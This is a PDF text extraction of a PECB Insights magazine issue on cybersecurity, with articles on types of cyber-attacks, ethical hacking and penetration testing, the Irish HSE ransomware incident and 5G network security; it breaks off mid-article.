PECB Insights Issue 39 July August 2022 Pages

Download as pdf or txt
Download as pdf or txt
You are on page 1of 86

ISSU E 39 I S O S T AN D ARD S AN D BE YON D JU L Y- A U G U ST 2022

NETWORK SECURITY,
ETHICAL HACKING, AND
CYBERSECURITY
PROTECT YOUR ONLINE PRESENCE

LEADERSHIP THE STANDARD EXPERTISE TECHNOLOGY BUSINESS & LEISURE CAREER


WORK-LIFE BALANCE SUCCESS STORY OPINION BOOKS INNOVATION
In This Issue
38 26 62

6 The Standard 42 Leadership


Why Metrology Matters in the Digital
IoT Security: Definition, Threats, Issues, Defenses,
Tools, and Importance
8 The Expert
What Do Cyber-Attacks Entail? 52 Business & Leisure

16 Opinion A Place to Be Sekondi-Takoradi: The Twin City of Ghana

Ethical Hacking vs Penetration Testing


58 Books
22 Success Story Ensure Your Cyber Safety – Essential Reads

My Success Story Jan Carroll


62 Technology
26 Innovation The Impact of AI on Cybersecurity

Network Security Architectures for 5G, Cloud, and


Disaggregated Telecom Infrastructures 72 Career

32 W o r k - Li f e B a l a nce Top Five High-Paying Job Positions You Can Pursue with
an ISO/IEC 27032 Certification
A Day in the Life of a Cybersecurity Expert
74 The Expert
38 The Expert
Network Security and Management A Deeper
The Use of Blockchain in Cybersecurity Understanding

The views and opinions expressed in the PECB Insights Magazine do not necessarily reflect the views of PECB Group.
© PECB 2022. All rights reserved.
3
“ The five most efficient
cyber defenders are:
Anticipation, Education,
Detection, Reaction
and Resilience.
Do remember:
"Cybersecurity is
much more than
an IT topic. ”
STEPHANE NAPPO
Vice President - Global Chief
Information Security Officer Groupe SEB

4
5
T H E S TA N D A RD insights.pecb.com

WHY METROLOGY MATTERS IN


THE DIGITAL ERA

T
omorrow’s metrology is the science of measurement and reduce delays associated with approval processes. In
for the digital economy. turn, this contributes to innovation, product agility, and
sustainability.”
Digital technologies such as artificial intelligence, big
data and machine learning are increasingly important to ISO has just signed the Joint Statement of Intent on the
the manufacturing industry. Just imagine the implications digital transformation in the international scientific and
on metrology – the science of measurement. quality infrastructure. The joint statement provides a
platform for the signatory organizations to indicate their
“Metrology in the Digital Era” is the theme of this year’s World support in a way that is appropriate to their particular
Metrology Day, celebrated annually on 20 May. The theme organization.
was chosen because digital technology is revolutionizing
metrology and is one of the most exciting trends in society This common understanding will help advance the
today. Accurate and fair data is an important cornerstone development, implementation, and promotion of the SI
of the digital development of science and technology. Digital Framework as part of a wider digital transformation
The resulting high-quality data, based on measurement of the international scientific and quality infrastructure.
standards, is the key to taking our industry to the next level
in the digital milestone.
The digital transformation of
As the BIPM and BIML directors state in their joint
metrology can bring many benefits to
message: “The digital transformation of metrology can
bring many benefits to our community. It can expedite our community.
time to market for measurement products and services

6
insights.pecb.com

The Joint Statement of Intent is part of an ongoing initiative The joint statement had previously been signed by the
to develop and establish a worldwide uniform and secure BIPM, the International Organization of Legal Metrology
data exchange format based on the International System (OIML), the International Measurement Confederation
of Units (SI), also known as the SI brochure. (IMEKO), the International Science Council (ISC), and its
Committee on Data (CODATA). “The addition of ISO further
The ISO 80000 series of standards for quantities and units is strengthens the collaboration and global reach of the
a vital element of the SI brochure as it provides harmonized initiative,” reads the BIPM press release.
terms, definitions, and symbols of quantities and units used
in science and engineering, providing a unified language Celebrated each year on 20 May, World Metrology Day
for communicating accurate measurement information commemorates the day back in 1875 in which the Treaty
between scientists, engineers and anyone involved of the Meter was signed, laying the foundations of a
in measurement. global system for common measurements that are all
based on constants of nature. The International Bureau
The SI Digital Framework will enable the implementation of Weights and Measures (BIPM) and the International
of new services that make best use of open data formats, Organization of Legal Metrology (OIML), which organize
software tools, and services that build upon the SI core World Metrology Day, actively liaise with a number of ISO
representation. Such services will help to produce technical committees.
high-quality data and make it available for analysis in
a coherent and consistent form. The outcome will be
new digital applications developed and deployed in the
Disclaimer: PECB has obtained permission to publish the
broader metrology community and in research disciplines articles written by ISO.
that rely on the SI.

7
insights.pecb.com

What Do Cyber-Attacks Entail?


B Y V I JAY KUM A R
T H E E XPE RT

T
he cyber world is growing rapidly. Everyone is involved,
either directly or indirectly. Everything is available
with a single click or tap on your mobile, tablet, or
PC. You can browse websites, listen to or download audio,
video, and software, place your order, buy products, book
tickets, hotels, buses, taxis, etc. It has been made easy for
everyone due to the cyber world or digital world. You can
see the very bright side of the cyber world, which you are
enjoying in your daily routine, however, there is a dark side
to the cyber world that exists in reality, called Cyber Crime
or Hacking.

Have you ever heard about cyber crime? It happens due to


cyber-attacks.

What is a cyber-attack?
The most valuable asset, nowadays, is data, not only for
organizations but also for individual users. If you are able
to protect your information or data, you or your organization
are stable and secure. Perhaps at first glance, it is difficult
to understand the importance, for those not that well-
versed with this industry, however, understanding the need
to stay protected is of high value today. Cyber-attackers, at
all times, are seeking these assets.

If you have data, you may fall victim to a cyber-attack.

We can define cyber-attacks as any type of illegal action


by cybercriminals, hackers, or cyber experts attempting
unauthorized access against a computer, information system,
network, infrastructure or personal computer, or devices
including; tablets, mobile phones, smart watches, smart TV, or
other smart devices with the help of various methods to steal,
alter, breach, modify, or destroy data or information systems.

What are the typical cyber-attacks?

1. Malware
In the cyber world, it has become common knowledge
that around 300,000 thousand new pieces of malware are
created daily.

8
insights.pecb.com

Malware is a piece of code (software) that can be installed  Pharming — Attacker uses Domain Name System
easily on your server, laptop or desktop, mobile device, (DNS) cache poisoning attack and manipulates DNS
tablet, etc., and it is used to leak private information or entry, to then redirect to a fake landing page to
gain unauthorized access to data, information, or systems. capture user credentials
 Voice Phishing – SMS Phishing – Attackers use phone
As stated by Datto, some types of malware are:
calls or text messages to manipulate users in order to
 Viruses — These infect applications by attaching collect information
themselves to the initialization sequence. The virus
replicates itself, infecting other files or code in the 3. Ransomware
computer system. Viruses can also attach themselves Ransomware is malware that encrypts critical data of a
to executable code or associate themselves with a file user or an organization so that they cannot access files,
by creating a virus file with the same name but with databases, or applications. The attacker decrypts the data
a .exe extension, thus creating a decoy that carries and makes it available to the victim only after the ransom
the virus. is paid. If the victim does not get access to the private key,
 Trojans — A program hiding inside a helpful program it is impossible to decrypt those encrypted files that are
with malicious purposes. It is commonly used to steal being held by ransom. According to snap-tech.com, global
information or establish a backdoor to be exploited ransomware damage costs are predicted to exceed $265
by attackers. billion by 2031.
 Worms — Unlike viruses, they do not attack the host,
being self-contained programs that propagate across 4. Cryptojacking
networks and computers. Worms are often installed
Cryptojacking is another form of cyber-attack. It involves
through email attachments. They are commonly used
the malicious act of the hacker, entirely hidden from the
to overload an email server and achieve a denial-of-
victim, to unauthorized use of the victim's computing
service attack.
resources for mining cryptocurrency.
 Spyware — These programs are installed on laptops,
mobiles, and other devices and are used to collect
information about users, their systems, or browsing 5. Drive-By Attack
activities, sending the data to a remote user, the hacker. In a drive-by attack, sometimes referred to as a drive-by
download, the attacker seeks vulnerabilities in various web
2. Phishing browsers, plugins, or apps, to launch the attack. No action
from the victim is required to initiate. With the help of this
Approximately 6.4 billion fake emails are sent every day.
attack, hackers can hijack the device, install malware,
For this reason, the attacker targets many victims for a
keylogger, or spyware to spy on the user's activity in an
phishing attack.
attempt to steal critical data or personal information.
The most common and popular cyber-attack is Phishing,
which indicates sending mass quantities of fraudulent
6.MitM (Man-in-the-Middle) Attack
emails to unsuspecting users, in a manner that appears as
a reliable source. This is the most common attack and it is performed
through public Wi-Fi. The attacker inserts themselves
Phishing attacks can also occur via social media, direct between the public Wi-Fi AP and the visitor’s device
messages, or other online communities targeted by users and starts intercepting a two-party communication or a
with hidden intent. transaction. From there, cyber-attackers can steal the
password credential and other sensitive information, or
There are multiple types of phishing attacks, as follows: potentially manipulate data by intercepting traffic.

 Spear Phishing — Specific organizations or individuals


are targeted 7.Session Hijacking
 Whaling — In an attempt to gain access to classified In this attack, the attacker takes over a session between a
information, senior directors, stakeholders, or C-Level client and the server, this leads to the victim losing access
executives are targeted to their social media accounts.

9
insights.pecb.com

8. Password Attack
Because passwords are the most basic used mechanism
to authenticate users to an information system, obtaining
passwords is a common and effective approach to attack.
Hacker uses sniffing, social engineering, and other
techniques to get access to passwords, to a password
database, or outright guessing. The last approach that
can be done, in either a random or systematic manner, is
T H E E XPE RT

brute-force and a dictionary attack.

9. Rootkits
Hackers install rootkits inside legitimate software,
therefore, once the victims install this software on their
system, it is activated and attackers can gain remote
control or administration-level access over a system. Later,
the attacker uses it to steal passwords, keys, or other
credentials, and retrieve critical data.

10. Internet of Things (IoT) Attacks


Multiple research shows that a large percentage of
organizations worldwide have experienced an IoT attack.

Attacks on IoT devices grow rapidly due to gaining


popularity and since these devices are given low priority to
embed security in their operating systems.

11. Denial-of-Service (DoS) Attack


In a DoS attack, attackers work by flooding traffic to
systems, servers, or networks, and overload resources
and bandwidth. In result, the server or system is unable
to process legitimate requests. Another type of denial-
of-service (DoS) attacks is distributed denial-of-service
(DDoS) attacks.

12. SQL Injections


In this attack, an attacker inserts malicious code into a
server using a server query language (SQL) forcing the
server to deliver protected information. This happens on
unprotected or less secure websites.

13. Zero-Day Exploit


A Zero-day Exploit refers to exploiting an unknown
vulnerability in an application, system, network, etc. It
also refers to exploiting a new and recently announced
vulnerability prior to any patch being released
or implemented.

10
14. Cross-Site Scripting
A cross-site scripting attack sends malicious scripts 7. Software supply chain attacks have increased by
into content from reliable websites (unprotected or less 650%, in 2021.
protected). The malicious code serves with the dynamic 8. The healthcare industry has seen a 51% increase
content to the victim’s browser. Usually, this malicious in breaches and leaks since 2019. Furthermore,
code may have JavaScript code executed in the victim’s 70% of surveyed organizations reported healthcare
browser but can include Flash, HTML, and XSS. ransomware attacks.

Facts about Cyber-attacks: 9. By 2025, cryptocurrency crime is predicted to surpass


$30 billion, up from $17.5 billion in 2021 according to
1. Botnets are responsible for 31% of all cyber-attacks Cybersecurity Ventures.
targeting corporate networks.
10. In a recent phishing attack, $7 million in NFTs were
2. Education and Research was the most targeted stolen from OpenSea users.
sector, which are facing an average of 1,605
11. In 2021, organizations experienced the highest
weekly attacks.
average cost of a data breach in 17 years at $4.24
3. The malicious file type EXE is making up 52%, PDF million, rising from $3.86 million the previous year.
comprising 20%, and DOCs in 5% of all malicious files.
12. Mobile apps are responsible for 80% of mobile fraud.
4. Over 84% of all cyber-attacks were distributed via
e-mail in 2021. Can ethical hacking protect you from
5. Cybercriminals can penetrate 93% of company cyber-attacks?
networks. Ethical hacking not only protects you from cyber-attacks
6. Cyber-attacks are up 50% in 2021 in comparison but also combats the hacker. Hacking is a bunch of skills,
to 2020, peaking in December, largely due to methods, and techniques used by a hacker to commit a
Log4j exploitations. cyber-attack.

11
T H E E XPE RT insights.pecb.com

12
insights.pecb.com

Ethical hacking is the process of hacking in an ethical way,


the persons who are involved in this process are called
ethical hackers.

Ethical hackers are responsible to:

 Test a system, application, or network for security


vulnerabilities to evaluate its performance.
 Test the security of the system and find any weakness
they suggest ways to improve it.
 Perform regular pen testing, which helps to improve
the security of the system, web app,
and network.
 After identifying vulnerabilities in the system, they
should create reports and provide feedback after the
issue has been resolved.
 Inform the organization of the possible effects on its
operations and users.
 Use hacking as a technique to find solutions for the
system’s exploiting points.

Essential steps to protect yourself from cyber-attacks:

 Install anti-virus and anti-malware software on your


devices (PC, mobile).
 You must set up a strong password (combination
of number, small and capital letters, symbols, and
numbers), gesture, or fingerprint.
 Avoid using most commands and basic passwords. Use
different passwords for different websites.
 Always hide or switch off Bluetooth when not in use
and disable automatic connection to networks.
 Do not open emails from unknown sources (email
addresses) and avoid risky clicks.

Vijay Kumar
Ethical Hacking, VAPT, CEH,
CompTIA Security+, CySA, Linux,
and Networking Trainer

Vijay Kumar has several years of


experience in the field of cybersecurity
as a trainer, writer, and consultant. He
has experienced in delivering training on Ethical Hacking,
VAPT, CompTIA Security +, CompTIA CySA+, CEH, OSCP,
Linux System & Server Administrator, Networking Basic and
Advanced. He has delivered trainings to individuals, college
students, corporates, and Government Bodies. You may
reach him through https://cyberpratibha.com/

13
PECB is Delighted
to Receive the
“Most Innovative
Cybersecurity Training”
Award 2022
This award is presented to PECB by the
prestigious Global InfoSec Awards 2022, which
honors companies that present a unique and
valuable scheme for their services
and products.

We would like to deeply thank our customers


and network for their continual trust and
support. Through that, we have been able to
accomplish yet another achievement that
reinforces our credibility, hard work, and
commitment to continuously provide the
greatest quality services to our clients.

FIND OUT MORE


insights.pecb.com

Ethical Hacking vs
Penetration Testing
B Y B A S S E M L A M O UC HI

D
OPIN ION

uring the last decade, we have faced the grim reality


that is cyber-attacks in their most sophisticated
forms. Incidents orchestrated by malicious actors
that tested many companies’ cybersecurity practices, and
even brought other companies to bankruptcy.

The goals for such attacks often vary, depending on the


actor, malicious actors do it for financial gain, activists
operate for a multitude of reasons, fun, profit, and to
advocate change, and state-aligned actors attack each
other as a new form of warfare.

These attacks have been getting more and more


sophisticated as time goes by; there are many examples,
such as the most prolific ransomware group, Conti, which
managed to gain $180 million from its victims last year
through various cyber-attacks, or the Netwalker ransomware
attack executed on Equinix, one of the largest data center
provider companies in the world, demanding $4.5 million.

As these attacks evolve, the defending side also adapts and


develops in order to be able to protect and secure public
and private infrastructure from these devastating attacks,
often using new, innovative, and clever ways, since the
ancient ways of simple cybersecurity and compliance
audits are no longer sufficient all by themselves.

This is the difference or gap created by modern,


sophisticated cyber-attacks. Two decades ago, a crude
but thorough cybersecurity and compliance audit was
necessary since most corporates infrastructure was relatively
small compared to the modern, federated, decentralized,
cloud, and microservice-based infrastructure.

Securing, auditing, and maintaining massive modern


networks requires considerable time and effort with a
specific competence not easily found among most network
engineers and other IT professionals.

Many new approaches and strategies have been invented


to deal with this issue, so far, the most commonly utilized
strategy is the employment of a wide set of practices under
the term "ethical hacking."

16
insights.pecb.com

What is ethical hacking exactly, and what It is possibly one of the most effective, time and cost-efficient
does it constitute? ways to enhance an organization's cybersecurity posture due
to its flexible nature and realistic practices.
In simple terms, ethical hacking is an authorized, simulated
attack against a computer, network, or organization to
identify existing cybersecurity vulnerabilities and system Are such practices legal?
misconfigurations, gauge the risks, and protect them from
The target organization explicitly authorizes these operations
real threat actors (malicious hackers).
in order to assess their security posture and fix any weaknesses
that exist within.

In fact, these operations are often ordered by the higher-ups


of the organization, sometimes without the knowledge of the
subordinates in order to simulate an actual attack, but this is
not always the case, as the scope and goals always vary from
one operation to another.

Who executes ethical hacking operations?


Authorized attacks are often carried out by professional
cybersecurity experts known as "white hats or white hat
hackers." Regarding technical proficiency, white hats must
present a thorough, top-to-bottom expertise in networks,
operating systems, databases, web servers, web applications,
mobile applications, and other concepts, such as Cloud
Computing and IoT.

As for trade proficiency, white hats must have a grasp of


the legalities surrounding the operation and the industry
as a whole, the principles of information security, and the
compliance involved.

What does ethical hacking consist of?


Ethical hacking is a very broad term that helps companies to
evaluate the risks of cyber-attacks and can encapsulate many
operational concepts depending on the customer goals and
his desired scope of simulation, but the four most relevant
ones are; vulnerability assessments, penetration testing,
red teaming, and bug bounties programs. These different
operations vary in size, scope, rules of engagement, and goals.

A. Vulnerability Assessment
Usually considered an audit against a target or a list of targets
that vary in nature (networks, computers, or applications) and
attempts to find all known vulnerabilities.

Vulnerability assessments attempt to discover a very wide area


of vulnerabilities, misconfigurations, and non-compliances
that developers and system administrators usually cannot
catch, a vulnerability assessment must be thorough,
enforcing, and methodical.

17
insights.pecb.com

Vulnerability assessment follows a very specific four step B. Penetration Testing


lifecycle:
Often like a red teaming exercise, penetration testers use
1. Asset discovery their experience in order to attempt to attack all possible
angles of the organizational structure.
2. Asset prioritization and target configuration
3. Vulnerability scanning Penetration tests also consist, usually, of a five step
4. Result analysis and actions comprehensive lifecycle:

1. Planning and Reconnaissance


1. Asset discovery
OPIN ION

2. Scanning
First, the operator needs to make sense of the target 3. Gaining System Access
infrastructure and understand the big picture; this usually
4. Persistent Access and Housekeeping
is a tricky phase since the operator has no guarantees that
the target will be fully visible, and even if it is, it is even 5. Analysis and Reporting
tougher organizing their digital footprints.
1. Planning and Reconnaissance

2. Asset prioritization and target configuration This phase covers describing and defining the scope as well
as limits of the test and a preliminary, (often automated)
This part of the assessment is completed by organizing the
information gathering mission in order to understand the
assets into clearly ordered priorities and organized attack
infrastructure and topology of the target entity. By the
metrics, this is not necessary if the customer can afford
end of this step, the pentester team will have as much
a full scan on each and every single one of its assets, but information as possible to map the attack surface.
most cannot afford it, so they resort to scanning their most
critical assets, which are usually public internet facing web
applications, servers, or internal critical infrastructure, 2. Scanning
such as a domain controller, some targets require finer This phase, based on the information acquired from
tuning than others depending on their nature, criticality, phase one, attempts and gets not only a complete top-to-
and robustness. bottom granular technical overview of the target entity's
technology stacks (services, defensive measures, etc.),
but also a list of vulnerabilities that can be exploited.
3. Vulnerability scanning
The most important step of the process, using a massive
database of publicly known vulnerabilities and the 3. Gaining System Access
ability to scan, probe, and attempt to check the target’s The penetration testers parse all the information they have
service vulnerabilities. It is only a matter of time until the acquired throughout phase one and phase two and look for
vulnerabilities are identified and the report is generated misconfigurations and exploitable vulnerabilities that will
based on a predefined baseline. At this stage, the pentester allow them to gain network or system access belonging to
team must well configure the vulnerability scanners to the target then run the payload to exploit the target.
reduce the number of false positives.

4. Persistent Access and Housekeeping


4. Result analysis and actions
Once one or more systems have been successfully
Vulnerability scanners, no matter how advanced, are attacked, the penetration testers try to understand how
still tools; they may generate false positive, and they far they can go inside the target system by trying to infect
may identify a vulnerability that does not really exist or more machines, intruding on more networks, escalating
bump up the severity rating on a relatively harmless bug, their privileges, packaging, and exfiltrating as much
therefore, human bug triaging and analysis is instrumental valuable data as possible. The testers must not forget that
to a successful assessment, the operators will check and housekeeping is essential; any modifications to the target
recheck for the existence and severity of identified bugs, systems must be reverted and rolled back; in other words,
as well as vulnerabilities in an attempt to patch them in a the target system must be exactly what it was like before
suitable manner. starting the penetration test.

18
insights.pecb.com

19
OPIN ION insights.pecb.com

5. Analysis and Reporting Operators will use tactics that emulate known adversaries
(criminals, state actors), as well as develop their
The penetration testers compile the results and findings
own tactics.
of their operation into a report, findings such as the
vulnerabilities exploited, a list of machines successfully Red teaming follows an attack lifecycle very similar to
infected, and weaknesses found in security systems. penetration tests, but unlike penetration tests, where
the target is to map out and exploit every attack vector
This report will be sent to the target organization for
possible, the red team's target is to reach a well-defined
analysis. In the meantime, the penetration testers will
objective, such as access to a server, access to a network,
work with the corresponding team to fix any weaknesses
creating a successful data breach, or acquire domain
they find. It is pivotal that organizations running critical
controller admin account. Usually, red teaming operations
infrastructure conduct, regularly and often, penetration
follows the MITRE ATT&CK framework and mostly deliver
tests to get the most accurate and complete overview of
the attack using social engineering.
their security posture.

C. Red Teaming D. Bug Bounties


A method of loose cooperation between corporations and
Attempts to simulate a real threat, actor's attack against
paid volunteers in the form of a bounty program, bug
the target organization, trying to gain access and reach
bounties are essentially companies giving ethical hackers
the goals by any means necessary.
the permission to attempt and exploit their applications
Most members in the organization should have no idea and infrastructure, as long as the ethical hacker
that a red teaming operation is taking place. Otherwise, it responsibly cooperates in vulnerability disclosure and the
defeats the purpose. payoffs are often massive.

20
insights.pecb.com

Many large corporations such as FAANG (Facebook, Bassem Lamouchi


Amazon, Apple, Netflix, and Google) or even government EC-Council and PECB Trainer
organizations, such as the US Department of Defense | Third Party Auditor | CISSP
(DoD) implement their own bug bounty programs. | SOC Analyst | CEH MASTER |
CHFI | ECIH
This kind of program will help companies to fix new
vulnerabilities, assign them a unique ID called CVE Bassem is a cybersecurity and
(Common Vulnerabilities and Exposures) and then add Cloud Computing professional with
them to the database of publicly known vulnerabilities highly valuable technical skills. He has successfully
which is used by vulnerability scanners. led many security audits, incident handling, and
forensics projects in the private sector and particularly
Each of these methodologies and operations employs in the banking and financial services sector. Bassem
ethical hacking and is essential to maintaining a sufficiently has gained valuable international experience which
advanced cybersecurity posture to protect organizations includes working in Ivory Coast, Mali, Niger, Togo,
and their subsidiaries and assets from harm caused by all Senegal, Benin, France, Canada, Guinea, Burundi,
sorts of malicious actors in cyberspace. Kenya, Madagascar, and Ghana. In addition to
consulting, he is a certified PECB trainer teaching
Neither of these methodologies is enough on its own, and courses such as ISO/IEC 27001, ISO 22301, ISO 21001,
they all must be combined and carried out regularly or risk ISO/IEC 27032, Lead Ethical Hacking, and Lead Cloud
asset loss through cyber-attacks. Security Manager.

21
insights.pecb.com

My Success Story
Jan Carroll
S UC C E S S S TORY

In May 2021, Ireland suffered its most catastrophic


cybersecurity attack to date. Our Health Service Executive,
which manages our national health service of 4,000
locations, 54 acute hospitals, and over 70,000 devices,
suffered a Conti ransomware attack from the Russia-based
Wizard Spider group.

Almost immediately, the IT systems were shut down and


internet access was removed. The HSE is the largest
employer in the state with over 130,000 staff, all of whom
reverted to using pen and paper with no access to patient
records. As it was a ‘double extortion’ attack the attackers
had also stolen patient data which they were threatening
to release, some of which was published online.

This had a huge impact on patient care as thousands of


appointments were canceled. The group demanded €16.5
million in ransom which was not paid but in a surprising
turn of events, the gang released the decryption key. The
clean-up operation took months and reports of costing
up to €500 million, the effects of this attack are still
being experienced.

Other opportunistic criminals took advantage of this


event and the leaked data, as a pretext for vishing
scams. Calling individuals to threaten the release of their
medical information and demand money. This attack had
an immediate impact on thousands of patients but then
rippled to impact other individuals and organizations
by forcing them to review their preparedness for such
an attack. Suddenly, everyone in the country knew what
cybersecurity was.

Ireland is home to the European headquarters of the


largest tech companies in the world and has a thriving tech
workforce. We are suffering the same cyber skills gap as the
rest of the world with nearly half of cyber and infosec roles
remaining unfilled. On top of this, many organizations lack
a ‘security culture’ and continue to think that cybersecurity
is an IT problem rather than everyone's problem to tackle.

Personally, this attack impacted those close to me by


restricting their access to medical services and I received
numerous vishing phone calls.

22
insights.pecb.com

Professionally, I had recently taken on a role as a lecturer Early Days


to create a Professional Diploma in Cybersecurity with UCD
I left school in the early 90s but going to college was not
Professional Academy. Due to the attack, the demand for
an option then. Most young Irish people went straight to
this course was overwhelming as managers scrambled to
work or failing that, emigrated. I took a different path by
get guidance on the threats they faced. I am grateful that
training to be an electrician, a very unpopular choice for
I can give my students the knowledge and tools for them
young women at the time and still is. I adored the work and
to improve their organization’s security posture by putting
working on building sites and after a few years, I decided to
the correct incident responses in place so they can reduce
go to college, to study electronic engineering, as a mature
the impact and recover quickly from such an attack.
student. I have been a lifelong learner ever since.

I love learning and I am constantly taking certifications


and training. I still strive for equal opportunities for women
in trades and STEM.

After graduating I worked as an IC layout technician and


Electronics Technician in a college. At this point, I had just
had my third child and we faced a common dilemma for
young families with spiraling childcare costs. Our solution
was also common, as I decided to take some time out to
care for my children.

After a couple of years, I returned to work. I sought a role


that would work with my family, and I went into IT teaching.
This was an excellent fit and I went on to study for a Master's
in Adult Education and took more tech qualifications.

This was a hugely rewarding role as it was ‘second-chance’


education for adults who missed out on their education
when they were young. Many students progressed to work
or college, to pursue their dream roles.

Moving into Cybersecurity


One time in a class we were discussing progression and
the opportunities available to young people now, when
I was asked if I had my time again, what career would I
choose? I did not hesitate and chose cybersecurity. It was a
lightbulb moment and by the end of the day, I had enrolled
in a Master's in Applied Cybersecurity at Technological
University Dublin, the same college I had worked in
earlier in my career. The program ran for over two years,
and I enjoyed every part of it, the pen testing, the secure
networks, the programming, all of it.

I learned a huge amount and made fantastic connections.


The next year I gave up teaching and started working with
small businesses helping them prepare for the impending
GDPR. I enjoyed this role and wanted more experience as
a practitioner and auditor in the industry, so over the next
few years, I got the opportunity to work in some of the
top infosec and cybersecurity firms in Ireland. I was very
content with my role and did not regret making a career
change in my forties. Life was good, then Covid-19 hit.

23
insights.pecb.com

COVID-19 Hit Volunteer Work


When COVID-19 hit, I became part of the ‘great resignation’ One of the benefits of working for myself is that I can give
which was when many of us took the opportunity to take my time to causes close to my heart, such as organizations
stock and reevaluate our life paths and make a change. that promote the industry to young women, career
Ireland was under lockdown which meant working from changers, returners, and other underrepresented groups.
home, children home-schooling, and parents needing extra Volunteering is an opportunity to meet like-minded people
S UC C E S S S TORY

support. While it was a temporary situation, I made some who share your vision and see value in the experience, not
permanent changes by resigning from a role I loved, but it just financial goals.
was for the right reasons. I missed teaching and I wanted
to build something, a company that would close the cyber As a member of the committee of Cyber Women Ireland,
skills gap by offering training to professionals to upskill we work to increase girls' and women’s entry, retention,
or move into information security and cybersecurity. This and return to the cybersecurity industry. Returners are
is how Fortify Institute came to be. The mission of Fortify close to my heart as often women have left their successful
Institute is to provide quality cybersecurity, information careers due to overwhelming childcare costs. They make
security, and physical security training to professionals. this decision for their families at the time but when their
As a woman and someone who moved into cybersecurity children have grown or their relationships have broken
in my 40s, I wanted to offer these training opportunities to down, they need the support that the dedicated returner
women and older people too. program provides to return to work.

If I could offer advice to anyone considering a career change As a member of The National Cyber Awareness Task
is to look to cybersecurity and information security. There Force, our mission is to create learning resources for
are so many opportunities and many skills we have acquired frontline workers to support women suffering from tech-
by that stage of our lives that are transferable. Other facilitated abuse such as cyberstalking. This will take the
skills can be learned via accessible, affordable training. form of online training for police, health care workers,
Often our age, experience, and confidence are a great teachers, etc. ENISA, the European Cyber Agency, do
advantage. Get involved in your local cyber community, it fantastic work in researching cybersecurity trends
is a brilliant and fun way to grow your network and learn. and I am a member of the ENISA Ad-hoc working
One of my proudest accomplishments in my cyber career group for Cybersecurity Markets. ENISA often seeks
was to deliver a talk on cyber learning opportunities at security experts to join their working groups and it is a
BSides Dublin 2022, which is a wonderfully, community- wonderful opportunity to contribute to the community
focused organization. and connect with international experts. I mentor those
who enter cybersecurity but do not know where to start.
It is tough as many do not yet know where they
My Journey with PECB want to specialize.
When I created Fortify Institute, I looked at the certification
So, I encourage them to immerse themselves in cyber.
bodies out there whom I could reach out to, to gain
certification, and deliver certification and education as
a trainer. PECB has been a fantastic support to me and
Fortify Institute. Through PECB I am a Certified ISO/IEC
Lead Implementer, and I became a PECB Certified Trainer
which has opened so many opportunities for me.

I enjoy being part of the PECB community to write articles,


such as ‘The Role of the Human Factor: Social Engineering’,
and contributing to whitepapers, such as ‘Ethical Hacking
Whitepaper’ and ‘ISO/IEC 27002:2022 Whitepaper’.

As an SME business owner, this type of industry validation


is invaluable and helps me stand out in a crowded
marketplace. The PECB community is a fantastic source of
support and opportunities. PECB shares my values around
inclusivity and reducing barriers to education and training.

24
insights.pecb.com

Do some short free courses, listen to podcasts, read the Not an accumulated wealth perspective. I get to do the job
books, watch YouTube classes, sign up for national alerts I love in a thriving industry so yes; I am successful. I have
but most importantly, get involved with the community, recently been shortlisted as Cyber Educator of the Year
network, and volunteer. The rest will come. 2022 in the EU Cyber Awards which I am immensely proud
of. I see busy years ahead of me as I scale Fortify Institute
and partner with other organizations.
What the Future Holds
When I began writing this piece, I questioned whether I I will continue to learn and keep my skills up-to-date.
was successful. I am extremely fortunate; I am happy and I will continue to be active in the security community
healthy with wonderfully supportive family and friends. and support and mentor those who are entering the
Success is subjective and I consider it from a work-life industry. If I can aid you with your success, please connect
balance perspective. on LinkedIn.

25
insights.pecb.com

Network Security Architectures


for 5G, Cloud, and Disaggregated
Telecom Infrastructures
IN N OVAT ION

B Y S A A D S HE I KH

5
G deployments have grown exponentially during the
last 24 months, according to industry reports the
world will reach +1 billion 5G connections in 2022,
and +4.87 billion connections by 2027, combined with the
fact that 6.5GB average consumption per subscriber, with
the reach of 15GB in 2022. This is a scale of networks the
world has not seen before and the risk of not knowing what
we are going to manage is greater than any value that will
come from technology advancements.

The biggest concern, doubt, or customer requirement to


migrate services fast on these next generation networks
largely depends on how the Security Architecture will
address the following key points:

 Data Control and Security


 User Rights and Privacy
 Network Security

This discussion must be the first starting point for any


Future Network architecture plus with early beta type 6G
networks expected to be in 2027 era, we are just at a 5 year
gap from something, we in the Telecom industry, have not
been prepared for.

This is why I have selected this important topic of


“Network Security Architectures for 5G, Cloud, and
Disaggregated Telecom Infrastructure” to share my view
on how we can address these requirements, what we have
accomplished, and where there are gaps that need to be
addressed promptly.

Why Secure Connectivity is Vital


Telecom systems since the time of inception are trusted
and believed to deliver societal value but mostly the
trust in security is assumed which raises questions
when it comes to 5G Networks which are based on Cloud
connectivity models.

26
insights.pecb.com

Alone in 2021, the Network attacks rose by 31% , this is


why Telco’s spending on security infrastructure to build
future Networks.

It is not only the security of Networks but also data, as per


industry progress 73% of Telco’s data remains untapped
to deliver business value. Therefore, one important
aspect of delivering security is enabling the right End-to-
End data architecture that enables security as a service
solutions across the Networks all the way from Cloud,
to Core, to Edge.

5G Security Challenges Data Architecture Challenges


There has been a long debate on what should be the right During the time the world was shut down due to COVID-19
architecture for 5G and future Networks, and already within what kept it still functional behind closed doors was
ITU and 3GPP this domain is well addressed. However, the Telecom’s critical infrastructure and the systems that
real challenge of the new technology wave will only come made it possible to access the needed services in a
once we deploy it in a distributed fashion at scale. secure way.

This is because almost every real-use case of 5G and Therefore, although government support to accelerate
monetization sits outside the data center or a central new technology rollouts like 5G and Edge was created,
colocation. Large scale deployments of 5G means that what came natively was increased spending on security.
typical Telco will need to deploy thousands of mini 5G
networks for enterprise, each of which will have unique Alone, the global spending on network security has reached
needs. In addition, they cannot afford data aggregation $168 billion in 2022 which is over 15% in comparison to
in datacenters, so it must be broken out and processed at the previous year. What is obviously causing this is the
the nearest point of value, which mostly will be near to the horrendous growth of “data” to a level that we can safely
source at the Edge. say today’s business is all about data and an organization’s
unique capability to manage it in a secure manner.
This makes Telecom security discussions more challenging
because Edge is where IT&OT really meet the Telco world.  Google does it by knowing people search habits
It also means that simply Telecom security architecture  Facebook does it through social circle
will not be enough and that to make any real-use case from
 Uber by navigating world’s traffic
this complexity there is only one promised deployment
model which is based on “Network Disaggregation”.  Telco’s by monetizing their Pole position

In one way or another Telecom Networks will be designed


Understanding of this End-to-End story is of critical
with more “data Driven Architectures.”
importance before we devise any architecture or solution.

In an Open and Disaggregated world there are just too


Cyber Resilient Networks
many entry points for any security breach. The vital
importance of security and how it should be approached The biggest problem I have seen in Telecom Network
